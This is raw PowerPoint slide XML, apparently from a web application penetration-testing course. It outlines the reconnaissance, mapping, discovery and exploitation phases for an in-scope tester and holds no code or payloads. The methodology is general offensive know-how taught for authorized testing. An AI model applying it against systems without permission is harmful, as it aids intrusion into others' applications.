              <a:gd name="T10" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T19" fmla="*/ 0 h 8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1"/>
              <a:gd name="T31" fmla="*/ 0 h 813"/>
              <a:gd name="T32" fmla="*/ 761 w 761"/>
              <a:gd name="T33" fmla="*/ 813 h 8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1" h="813">
                <a:moveTo>
                  <a:pt x="35" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676" y="813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761" y="753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DDE2C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37232" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6296025" y="2452688"/>
            <a:ext cx="1006475" cy="1076325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T1" fmla="*/ 0 h 813"/>
              <a:gd name="T2" fmla="*/ 0 w 761"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T6" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T8" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T10" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T11" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T12" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T13" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T14" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T15" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T16" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T17" fmla="*/ 2147483647 h 813"/>
              <a:gd name="T18" fmla="*/ 2147483647 w 761"/>
              <a:gd name="T19" fmla="*/ 0 h 8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1"/>
              <a:gd name="T31" fmla="*/ 0 h 813"/>
              <a:gd name="T32" fmla="*/ 761 w 761"/>
              <a:gd name="T33" fmla="*/ 813 h 8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1" h="813">
                <a:moveTo>
                  <a:pt x="35" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="676" y="813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761" y="753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="85"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175" cap="rnd">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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137233" name="Freeform 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1635125" y="2362200"/>
            <a:ext cx="866775" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 298042 w 865681"/>
              <a:gd name="T1" fmla="*/ 0 h 537771"/>
              <a:gd name="T2" fmla="*/ 109141 w 865681"/>
              <a:gd name="T3" fmla="*/ 2 h 537771"/>
              <a:gd name="T4" fmla="*/ 952895 w 865681"/>
              <a:gd name="T5" fmla="*/ 2 h 537771"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 865681"/>
              <a:gd name="T10" fmla="*/ 0 h 537771"/>
              <a:gd name="T11" fmla="*/ 865681 w 865681"/>
              <a:gd name="T12" fmla="*/ 537771 h 537771"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="865681" h="537771">
                <a:moveTo>
                  <a:pt x="270764" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="135382" y="132536"/>
                  <a:pt x="0" y="265072"/>
                  <a:pt x="99153" y="354700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198306" y="444329"/>
                  <a:pt x="865681" y="537771"/>
                  <a:pt x="865681" y="537771"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="00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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137234" name="Freeform 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="2919413"/>
            <a:ext cx="865188" cy="433387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 259293 w 865681"/>
              <a:gd name="T1" fmla="*/ 0 h 537771"/>
              <a:gd name="T2" fmla="*/ 94955 w 865681"/>
              <a:gd name="T3" fmla="*/ 2 h 537771"/>
              <a:gd name="T4" fmla="*/ 829002 w 865681"/>
              <a:gd name="T5" fmla="*/ 2 h 537771"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 865681"/>
              <a:gd name="T10" fmla="*/ 0 h 537771"/>
              <a:gd name="T11" fmla="*/ 865681 w 865681"/>
              <a:gd name="T12" fmla="*/ 537771 h 537771"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="865681" h="537771">
                <a:moveTo>
                  <a:pt x="270764" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="135382" y="132536"/>
                  <a:pt x="0" y="265072"/>
                  <a:pt x="99153" y="354700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198306" y="444329"/>
                  <a:pt x="865681" y="537771"/>
                  <a:pt x="865681" y="537771"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="00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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137235" name="Freeform 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2632075" y="3476625"/>
            <a:ext cx="865188" cy="433388"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 259293 w 865681"/>
              <a:gd name="T1" fmla="*/ 0 h 537771"/>
              <a:gd name="T2" fmla="*/ 94955 w 865681"/>
              <a:gd name="T3" fmla="*/ 2 h 537771"/>
              <a:gd name="T4" fmla="*/ 829002 w 865681"/>
              <a:gd name="T5" fmla="*/ 2 h 537771"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 865681"/>
              <a:gd name="T10" fmla="*/ 0 h 537771"/>
              <a:gd name="T11" fmla="*/ 865681 w 865681"/>
              <a:gd name="T12" fmla="*/ 537771 h 537771"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="865681" h="537771">
                <a:moveTo>
                  <a:pt x="270764" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="135382" y="132536"/>
                  <a:pt x="0" y="265072"/>
                  <a:pt x="99153" y="354700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="198306" y="444329"/>
                  <a:pt x="865681" y="537771"/>
                  <a:pt x="865681" y="537771"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="00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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1630680"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Successful attackers focus here!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This step is commonly skipped as not important</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But it determines our attack focus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Good use of the recon phase can expose items such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Architecture diagrams</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information for password reset attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Skipping Reconnaissance forces the tester to work harder to exploit any issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This wastes time in an already restricted time frame </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85800" y="24434"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="304800" y="913193"/>
            <a:ext cx="8610600" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping involves understanding how the application and its underlying infrastructure work</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>First steps involve port scanning, version checking, and operating system fingerprinting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Then, we determine the various pieces of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>For example, a common storefront contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Catalog pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information about the company</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Shopping cart management pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Checkout and delivery system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User management for returning visitors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Testers should also examine the relationships between the parts of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>What is the logic flow as users move through the application?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Start thinking about how this logic flow can be circumvented if the developers made bad assumptions</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395287" y="1371600"/>
            <a:ext cx="8382000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The discovery step focuses on finding the issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Not exploiting them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some exploitation will happen due to the nature of the flaw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory browsing is one example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The only way to find the flaw is by exercising it in a relatively benign fashion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This phase will focus on finding:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Common applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>User interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Information leakage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Authentication systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Error messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We also build most of our scripts in this step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some will be built during exploitation</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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2059" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4752975" y="4375150"/>
            <a:ext cx="709613" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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2060" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="228600" y="1341120"/>
            <a:ext cx="8534400" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exploitation involves actually attacking the flaws in an application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Exercising its flaws to see what their implications are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each exploit builds a foothold into the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We then further that foothold through cycling through the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The tester should strive to see if a flaw in an application can be used to give the attacker control or access to other parts of the infrastructure that are also included in scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4051300" y="4032250"/>
            <a:ext cx="701675" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="5715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2062" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4752975" y="3643313"/>
            <a:ext cx="0" cy="1455737"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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2063" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3424238" y="4891088"/>
            <a:ext cx="2898775" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="762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2064" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5688013" y="4105275"/>
            <a:ext cx="596900" cy="238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DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2065" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
